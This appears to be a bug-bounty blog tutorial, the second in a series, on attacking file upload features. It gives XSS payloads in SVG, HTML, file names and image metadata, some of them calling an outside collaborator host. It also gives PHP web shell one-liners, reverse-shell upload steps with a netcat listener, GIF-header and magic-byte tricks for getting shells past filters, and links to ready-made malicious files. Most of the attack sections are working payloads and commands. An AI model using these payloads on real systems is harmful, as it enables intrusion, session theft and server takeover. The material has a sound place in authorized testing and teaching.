AlbusSec:- Penetration-list 02 File Upload Vulnerability— Part-2
Again Hi, Without wasting time We will jump into our topic for today article Overall, We will learn Remote code execution and also Cross-Site Scripting via file upload, If you have not read our part-1 then please see that article because that article contains basic things about file upload vulnerability and this article is a second part of the previous article. Firstly, I will introduce myself that I’m Aniket Tyagi and I’m an Information Technology officer at the 5f eco foundation of India and founder of Albus Security. However, First, we will learn Cross-Site-Scripting through file upload then We will learn about Remote code execution vulnerability then we will learn about the advanced bypass tricks and ZipSlip Attack. Let’s get started in our sage mode
→ Cross-Site-Scripting via a File Upload:-
I hope that you already know about Cross-site-Scripting Vulnerability. so directly jumping onto XSS through File Upload vulnerability. File upload functionality gives us multiple ways to execute cross-site scripting via uploading malicious files such as an SVG or HTML file. Another way is by changing the file name to the cross-site-scripting payload like this <img src=x onerror=alert()>.png and also you can add XSS payload into “Metadata” of the file. We will learn each topic one by one.
Cros-Site-Scripting via uploading Malicious files:-
For SVG:-
<svg version=”1.1" xmlns=”http://www.w3.org/2000/svg">
<script>
prompt()
</script>
</svg>
For HTML:-
<script type=”text/javascript”>
alert(document.cookie)
</script>
For blind-Xss Through file upload:-
<svg
xmlns=”http://www.w3.org/2000/svg"
xmlns:xlink=”http://www.w3.org/1999/xlink">
<polygon id=”triangle” points=”50,0 50,50 50,0" fill=”#009900" stroke=”#004400"/>
<script xlink:href=”https://burpsuite-Collaborator" />
<script>
prompt();
</script>
</polygon>
</svg>
For blind-Xss Through File-Upload:-
<h1>Blind-Xss-Through-File-Upload</h1>
<img src=”http://Burpsuite-Collaborator"/>
<script>
alert()
</script>
→ Changing file name to Xss payload:-
Now, the second way to test for XSS via a file upload is to change the filename into a Cross-site-scripting payload. For example- the attacker will try to upload HTML or svg files to execute XSS. but the server uses validation on their file upload functionality. so attacker try to change filename into XSS payload like this <img src=x onerror=alert()>.png then attacker successfully execute XSS via a file upload
Content-Disposition: form-data; name=”avatar”; filename=”<img src=x onerror=alert()>.png”
Content-Type: image/png
→ Cross-Site-Scripting through metadata:-
Metadata is the information of a file that makes it's working and it contains some basic information about the file like file size, file author, date created, date modified, etc, But how we execute Cross-Site-Scripting on it. So for this, We will put our XSS payload on image metadata. For changing the metadata and adding payload into the file of the metadata, we will be using Exiftool, So first we see our metadata of our file by using this command:-
./exiftool {filename}
With this command, you got metadata about the entered file, Now we will add a comment and on that comment, we will put our Cross-Site-Scripting payload on it by entering this command:-
./exiftool -comment=”<script>prompt()</script>” {filename}
Now, It is all about Cross-Site Scripting via uploading Malicious Files.
Penetration-List:- https://github.com/AlbusSec/Penetration-List/tree/main/File-Upload%20-02/Xss%20via%20file%20upload
→ Remote Code Execution:-
Whenever attackers/testers see file upload functionality So, the first thought that comes to Attacker’s mind is to upload the shell and execute some malicious command on sever Basically Remote Code Execution. We have several ways to execute a code on a server through file upload the easiest one is to upload shell and gain further access. We also learn other methods.
Firstly, We will learn how to get shell access through the uploaded shell, So for this, I will use a PHP-reverse-shell, You can also use some other shell depending upon your requirement.
PHP-Reverse-shell:- https://github.com/pentestmonkey/php-reverse-shell
Before uploading this shell, You will need some configuration on shell Mean change this {Your-tun0-IP} {Port} like this:-
If you see some error like this that the server doesn’t support PHP extension, then use bypass tricks like this PHP → php5, php3, inc → png.php, png.php5, png.inc → pdf.svg.php, geo.csv.php5, jpg.png.inc, etc, After successfully uploading a shell, then First thing is that Find the uploaded shell path or Directory, For example, → https://AlbusSecurity.com/upload/files/shell.php If the shell is open, based on how the shell gets executed, then start your listener in your system for this Most of the bug hunter’s use Netcat listener for this, In php-reverse-shell I configured 443 port number so the command to start listener is { nc -lvnp 443 } Then execute your script that was uploaded on the server. If your shell works properly then you get reverse-shell.
Remote Code Execution Through Metadata:-
I have already explained to you about metadata, And now we will learn about how we will execute some commands into the server, Just changing metadata with PHP code, I will add PHP code in metadata like comment, DocumentName So for this, you can use ExifTool.
./exiftool -comment=”<?php system($_GET[‘cmd’]);?>” {filename}
After Uploading the file Find the file upload directory, for example, → https://AlbusSecurity.com/files/shell.php If the shell is accessible, try to execute commands against it like this: → https://AlbusSecurity.com/files/shell.php?cmd=whoami
→ ZipSlip Attack:-
ZipSlip Vulnerability is an interesting attack vector that can be tested when the application allows an attacker to upload archives in their file upload functionality and later unarchive it for further processing. And also results in remote command execution. This type of vulnerability has existed, But recently it has manifested itself in a much larger number of projects and libraries, So beginners have low chances to get this vulnerability but you can try to find it. When you see that your Target uses Javascript, Ruby, .Net, and Go, So It’s a plus point for us.
Some little steps to check this vulnerability:-
- Get your Malicious-Zip:- https://github.com/snyk/zip-slip-vulnerability/tree/master/archives
- Upload the malicious file to the archive upload functionality.
If you want to learn more about this vulnerability then check this:-https://snyk.io/research/zip-slip-vulnerability
Note: After Completing our Penetration-List project then, I will make some new malicious zip files,
→ Advanced Bypass Tricks:-
In this, We will learn more tricks to bypass the protection from File-Upload Vulnerability.
→ Malicious Gif:-
Gif stands for Graphics Interchange Format. I hope that you already know about the Gif file. Now, How do we use this to bypass file restriction? Simple Just Adding GIF8; to the beginning of the file content Like this:
GIF8; <?php echo shell_exec($_GET[‘cmd’]); ?>
You can also use a burp-suite for this:-
Step 1:- Upload the file and Intercept the request then Add GIF8; at beginning of the file, the content to make it look like a .gif file.
Step 2:- If you got an error then use a double extension like this php.gif
→ Magic Header Bytes:-
It is possible to convert a malicious file into a legitimate file. So Yes But how? By changing Magic Numbers. Basically, Magic Numbers are the first bits of a file that uniquely identify the type of file. To identify the particular file format you just need to look as far as the first few bytes of the file; that is why the magic number is also called Magic bytes. Now your mind put up a question like this how do we check for magic bytes and how do we bypass file restriction with the help of magic bytes. Magic numbers(File signatures) are typically not visible, but. You can see this by using a hex editor or by using the ‘xxd’ command to read the file.
→ A hex editor (or binary file editor or byte editor) is a computer program that allows for manipulation of the fundamental binary data that constitutes a computer file.
How We See Magic Numbers:-
Step 1:- Instal hexedit tool on your machine for this enter this command in your terminal:-
sudo apt-get install hexedit
Step 2:- Take one jpg file and enter this command:
xxd {JPG-FILE-NAME} | head: this command is used to see the magic bytes of a file
So, You can see that starting bytes FFD8 FFe0 0010 4A46 It’s mean that your file is jpg. To check what type of file is this then enter this command:-
file {JPG-FILE-NAME}
So, that’s how we see the magic number of a file. If you want to check more signature/Magic bytes of a particular file then please check this:- https://en.wikipedia.org/wiki/List_of_file_signatures
but how we will bypass file restrictions, So let’s take an example:- I try to upload php-reverse-shell, But I can’t upload on it. Because the server uses some advanced mechanism to protect itself, I need to bypass it So for this I will use Magic Header bytes tricks. Make it more simple — If I change php file magic bytes into jpg magic bytes then the php file treats like a jpg file. So that is how a malicious file looks like a legitimate file.
Follow these step’s:-
Step 1:- xxd php-reverse-shell.php | head:- To check PHP file Magic bytes
You can see that the php file magic number is different from the jpg file, Other files also have their Different Magic Number,
Step 2:- It’s time to change the magic number, copy this command:-
hexedit php-reverse-shell.php
then I will change the first bytes into FFD8 FFDB {those Magic bytes is used in jpg} Save it and press Ctrl+x to exit
Step 3:- For verification that you successfully change PHP magic bytes into jpg then enter this command:-
file php-reverse-shell.php
You see that it indicates that your file type is JPG. It’s Done upload this file and the Server doesn’t block You Because it assumes that You uploaded a jpg file. Because Server only checks the Magic Number of a file’s no other protection was implemented by the server. So that’s about how Magic Header Bytes bypass tricks work.
If you can’t understand how to make a malicious file that contains a corrupted Magic Number, don’t worry. I uploaded some php-reverse-shell with different file signatures/Magic-Bytes in my Penetration-List: https://github.com/AlbusSec/Penetration-List/tree/main/File-Upload%20-02/Malicious-Magic-Header-bytes-files
Congratulations, we almost cover lots of topics that come in File upload vulnerability. But wait for the third article because that article contains more things like SQL injection, Server-Side-Request-Forgery(SSRF) via uploading files, etc. Thank you for reading.
